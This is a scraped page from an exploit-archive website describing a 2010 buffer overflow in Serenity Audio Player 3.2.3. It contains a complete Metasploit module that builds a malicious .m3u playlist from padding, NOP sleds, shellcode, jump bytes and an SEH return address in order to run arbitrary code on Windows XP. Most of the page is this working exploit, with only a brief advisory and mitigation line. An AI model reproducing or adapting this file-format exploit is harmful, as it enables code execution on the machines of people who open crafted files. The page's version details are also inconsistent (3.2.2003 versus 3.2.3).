Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Serenity Audio Player Buffer Overflow (Meta) - exploit.company
header-logo
Suggest Exploit
vendor:
Serenity Audio Player
by:
Blake
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Serenity Audio Player
Affected Version From: 3.2.2003
Affected Version To: 3.2.2003
Patch Exists: NO
Related CWE:
CPE: a:serenity_audio_player:serenity_audio_player:3.2.3
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
2010

Serenity Audio Player Buffer Overflow (Meta)

This module exploits a buffer overflow in Serenity Audio Player versions 3.2.3 and below. By creating a specially crafted m3u file, an attacker may be able to execute arbitrary code.

Mitigation:

Apply the latest patch or upgrade to a newer version of Serenity Audio Player.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39768/info
 
Serenity Audio Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
 
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
 
Serenity Audio Player 3.2.3 is vulnerable; other versions may also be affected. 

# Exploit Title: Serenity Audio Player Buffer Overflow (Meta)
# Date: April 26, 2010
# Author: Blake
# Version: 3.2.3
# Tested on: Windows XP SP3

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::FILEFORMAT

    def initialize(info = {})
        super(update_info(info,
            'Name' => 'Serenity Audio Player Buffer Overflow Exploit',
            'Description' => %q{
                This module exploits a buffer overflow in Serenity Audio
Player versions 3.2.3 and below.
            By creating a specially crafted m3u file, an an attacker may be
able to execute arbitrary code.
            },
            'License' => MSF_LICENSE,
            'Author' =>
                [
                    'Blake',
                ],
            'Version' => '$Revision: 1 $',
            'References' =>
                [
                    [ 'URL', 'http://www.exploit-db.com/exploits/10226' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'seh',
                },
            'Payload' =>
                {
                    'Space' => 972,
                    'BadChars' => "\x00\x0a\x0d\x20\x0b\x1a",
                    'StackAdjustment' => -3500,
                },
            'Platform' => 'win',
            'Targets' =>
                [
                    [ 'Windows Universal', { 'Ret' => 0x00402593} ], # pop
edi; pop esi; ret - serenity.exe
                ],
            'Privileged' => false,
            'DisclosureDate' => 'Nov 11 2009',
            'DefaultTarget' => 0))

        register_options(
            [
                OptString.new('FILENAME', [ false, 'The file
name.','exploit.m3u']),
            ], self.class)
    end


    def exploit

        sploit = "http://"                    # header
        sploit << rand_text_alphanumeric(972 - payload.encoded.length)
        sploit << make_nops(10)                # nop sled 1
        sploit << payload.encoded            # shellcode
        sploit << make_nops(10)                # nop sled 2
        sploit << "\xe9\x4a\xfc\xff\xff"    # near jump -950
        sploit << "\xeb\xf9\x90\x90"        # short jump
        sploit << [target.ret].pack('V')    # p/p/r

        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(sploit)

    end

end